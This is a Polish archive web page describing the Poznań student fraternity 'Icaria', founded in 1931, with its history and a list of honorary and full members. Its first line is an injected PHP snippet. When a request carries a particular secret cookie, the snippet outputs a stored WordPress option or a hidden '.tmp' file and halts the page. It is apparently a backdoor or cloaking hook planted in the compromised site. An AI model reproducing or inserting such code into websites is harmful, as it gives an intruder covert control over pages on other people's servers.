if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Icaria

Dekiel Piotra Wójtowicza Nazwa:
Akademicka Korporacja „Icaria”, po 1934 r. Korporacja Studentów Uniwersytetu Poznańskiego „Icaria”
Siedziba:
Poznań
Data powstania:
8 II 1931 r.
Barwy:
granatowa - srebrna - amarantowa
Dewiza:
Ponad poziomy

Rys historyczny

Banda Piotra Wójtowicza, lata 30-te.

Icaria została założona 8 II 1931 r. przez grupę absolwentów Gimnazjum im. Jana Ignacego Paderewskiego. Celem korporacji było wspieranie lotnictwa oraz tworzenie kadr młodych pilotów.

Dnia 12 marca 1931 r. statut Icarii zatwierdził Senat Uniwersytetu Poznańskiego. Kuratorami Icarii z ramienia uczelni byli kolejno: doc. Stanisław Kolbuszewski, doc. Wiktor Dega oraz doc. Franciszek Łabendziński. Siedziba korporacji mieściła się początkowo przy ul. Wyspiańskiego 14 (przy Gimnazjum im. J.I. Paderewskiego), a następnie między innymi przy pl. Św. Krzyski 3/12 oraz od 1936 r. przy ul. Pierackiego 18/16 w Poznaniu.

Uroczystości V-lecia i poświęcenia sztandaru Icarii, Poznań luty 1936 r.

Od dnia 26 IV 1932 r. Icaria należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 26 IV 1932 r.). Kandydowała przy K! Magna-Polonia. Prawa członka rzeczywistego uzyskała w 1933 r.

Ślub Edwarda Gierlińskiego, lipiec 1939 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 48 nazwisk, w tym ośmiu członków honorowych.

W latach powojennych odbywały się w Poznaniu spotkania niewielkiej grupy Icarusów.

Lista członków

Poniższa, niekompletna lista członków Icarii obejmuje niemal pięćdziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Wiktor Dega, (7 grudnia 1896 w Poznaniu - 16 lutego 1995 w Poznaniu) s. Wiktora i Zofii z d. Korzbok-Tuchoła, uczeń Gimnazjum Marii Magdaleny, w czasie I wojny światowej w armii niemieckiej, następnie powstaniec wielkopolski, student med. UW i UP, dr med. UP 1924, ortopeda, chirurg, habilitacja UP 1933, Filister honorowy Icarii, uczestnik wojny obronnej 1939, po wojnie prof. kierownik Katedry i Kliniki Ortopedycznej UP, a od 1950 AM w Poznaniu, rektor 1959-62, dr honoris causa Akademii Medycznych: w Poznaniu 1968, Krakowie 1974, Wrocławiu 1973, Łodzi 1977, Akademii Wychowania Fizycznego w Poznaniu i Uniwersytetu w Halle-Wittenberg 1977, członek prezydium PAN, pierwszy Kawaler Orderu Uśmiechu 1969, a następnie członek Międzynarodowej Kapituły Orderu Uśmiechu

  Józef Glabisz, 1931 r.

 2. Józef Glabisz, (1880-1935), brat Leonharda, ojciec Władysława (obaj Icaria), adwokat, od 1919 właściciel maj. w Szreniawie, Filister honorowy Icarii

 3. Leonhard (Leonard) Glabisz, (1871-1951), brat Józefa, stryj Władysława (obaj Icaria), prof. i pierwszy dyrektor 1926-30 WSH, Ojciec Korporacji Mercuria, Filister honorowy Icarii
 4. Stanisław Kolbuszewski, (22 czerwca 1901 w Przemyślu - 7 stycznia 1965 we Wrocławiu), historyk literatury polskiej, slawista, prof. uniwersytetów w Poznaniu i Rydze, pierwszy kurator i Filister honorowy Icarii, po wojnie organizator i prof. UWr., od 1950 prof. Wyższej Szkoły Pedagogicznej w Opolu, rektor 1956-59, współinicjator powołania Opolskiego Towarzystwa Przyjaciół Nauk, pochowany na Cmentarzu Osobowickim we Wrocławiu
 5. Franciszek Łabendziński, (9 października 1887 w Poznaniu - 1 lutego 1964 w Poznaniu) s. Jana i Bronisławy z Sypniewskich, absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1906, studiował med. w Berlinie, Paryżu, Strasburgu i Monachium, dr med. Monachium 1912, internista, lekarz WP 1920-21, wykładowca, a od 1939 prof. tytularny UP, trzeci kurator i Filister honorowy Icarii, Filister honorowy Aesculapii, w 1939 ordynator oddziału szpitala polowego w wojnie obronnej 1939, w 1939 wysiedlony do Generalnej Guberni, w czasie II wojny światowej wykładowca kieleckiego oddziału Tajnego Uniwersytetu Ziem Zachodnich w Warszawie, po wojnie prof. UP, prof. zw. 1956, pochowany na Cmentarzu Junikowskim w Poznaniu

  Magowski, 1932 r.

 6. Magowski, dr, Filister honorowy Icarii

 7. Józef Szulwic, (19 marca 1903 w Naguszewie pow. Lubawa - 1945) student i absolwent med. UP, c. 1923 Magna-Polonia, wiceprezes 1931, członek wielu komisji konwentowych, kurator Icarii i Filister honorowy Icarii, dr med., zamordowany przez Niemców

  Stanisław Tuszewski, lata 30-te.

 8. Stanisław Tuszewski, (1885-1962), dr med., Ojciec Korporacji

Członkowie rzeczywiści

 1. Edmund Bartkowiak, (24 października 1909 w Poznaniu -15 stycznia 1980), student i absolwent 1939 med. UP, wiceprezes 1933, prezes sem. let. 1932/33, wiceprezes 1933/34, prezes 1934/35, w czasie II wojny światowej w konspiracji, od 1943 więzień obozu koncentracyjnego w Mauthausen, dr med. 1949, ortopeda, habilitacja 1962, prof. AM w Łodzi, założyciel Katedry i Kliniki Ortopedii AM w Łodzi
 2. Stanisław Bartoszkiewicz, skreślony 1936
 3. Leon Bąkowski, (1915 - ) c. 1937, student UP oraz Uniwersytetu w Rzymie, mgr praw, adwokat
 4. Bogdan Borusiak, skarbnik sem. let. 1938/39 (ostatnie Prezydium przed wojną)
 5. Antoni Cendler,
 6. Aleksander Czerniak, prezes sem. let. 1937/38
 7. Julian Echaust (?), skreślony 1936

  Edward Gierliński, 1939 r.

 8. Edward Gierliński, wiceprezes 1931, prezes 1931/32, prawnik (?)

  Władysław Glabisz, 1931 r.

 9. Władysław Glabisz, (1911-1977) s. Józefa, bratanek Leonharda (obaj Icaria), olderman 1931, wiceprezes 1931/32, prezes 1932/33 i 1933/34, członek Zarządu Akademickiego Koła LOPP

 10. Konrad Gryczka, sekretarz sem. let. 1937/38
 11. Teodor Janicki, (1915-1991), sekretarz sem. let. 1935/36, wiceprezes sem. let. 1936/37 oraz sem. let. 1937/38
 12. Stanisław Józefiak, sekretarz sem. let. 1938/39 (ostatnie Prezydium przed wojną)
 13. Henryk Kokot, sekretarz 1933/34, wiceprezes 1934/35
 14. Zenon Kopeć, II wiceprezes sem. let. 1935/36
 15. Alojzy Kubczak, skreślony 1934, po wojnie na emigracji w Wielkiej Brytanii
 16. Kwadyński,

  Adam Lach, lata 30-te.

 17. Adam Lach, (1913 - 17 kwietnia 1992) wiceprezes sem. let. 1933/34, prezes sem. let. 1935/36

 18. Witold Lenartowski, sekretarz 1931, prezes 1933

  Wolfgang Leonhardt, 1939 r.

 19. Wolfgang Leonhardt, sekretarz sem. let. 1933/34, mgr praw

 20. Zenon Lewandowski, sekretarz sem. let. 1936/37

  Leon Łuczak, 1931 r.

 21. Leon Łuczak, (28 maja 1910 w Bochum - 1940 w Charkowie), s. Walentego, prezes 1931, dr med., ppor. rez., w wojnie obronnej 1939 w Szpitalu Polowym w Kowlu, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD

 22. Mieczysław Magiera, (1910 - październik 1993) brat Zbigniewa (Icaria), student i absolwent prawa UP, c. 1931, skreślony 1936
 23. Zbigniew Magiera, ( - przed 1984) brat Mieczysława (Icaria), skreślony 1936
 24. Zbigniew Michalski, (16 marca 1914 - 17 września 2012), skarbnik sem. let. 1937/38, prezes sem. let. 1938/39 (ostatnie Prezydium przed wojną), pochowany na cmentarzu w Strzelcach Krajeńskich
 25. Ignacy Mossor, wiceprezes 1932/33, skreślony 1936
 26. Marian Rafiński, sekretarz 1933/34, sekretarz sem. zim. 1936/37, lekarz laryngolog
 27. Henryk Ratyński, I wiceprezes sem. let. 1935/36, wiceprezes sem. zim. 1936/37
 28. Erhard Roller, sekretarz 1931/32 oraz 1934/35
 29. Adam Rynek, (1912-1989), olderman 1938/39
 30. Albin Rynek, 1909?-1989) olderman sem. let. 1937/38

  Ryszard Schönhofer, po 1945 r.

 31. Ryszard Schönhofer, (13 marca 1914 w Skle - 4 czerwca 1993) student i absolwent med. UP, c. 1935, skarbnik sem. let. 1936/37, dr med.

 32. J. Sokołowski,
 33. Józef Stankowski, wiceprezes sem. let. 1938/39 (ostatnie Prezydium przed wojną)
 34. Kazimierz Szczerbicki, sekretarz 1932/33
 35. Szweykowski,
 36. Śmigaj,
 37. Edmund Tundak , ( - 1985) prezes sem. let. 1933/34, członek Zarządu Akademickiego Koła LOPP, po wojnie na emigracji w Wielkiej Brytanii
 38. Jerzy Tylman, wiceprezes sem. let. 1932/33
 39. Józef Wiśniewski, sekretarz 1933, prezes sem. zim. 1936/37

  Piotr Wójtowicz, 1938 r.

 40. Piotr Wójtowicz, (1908 - 14 września 1993) student i absolwent polonistyki UP, sekretarz sem. let. 1932/33, prof. gimnazjum, członek Zarządu Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich 1991-1993

Listę członków opracowano na podstawie:

1) Z. Kordus (uzupełnienie K. A. Tyszka), Lista członków Polskiej Korporacji Akademickiej Icaria (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 128 i n.,
2) materiałów archiwalnych z Archiwum UAM,
3) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Icarii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 30 IV 2018 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego „Icaria”, (na:) www.archiwumkorporacyjne.pl, stan 30 IV 2018 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }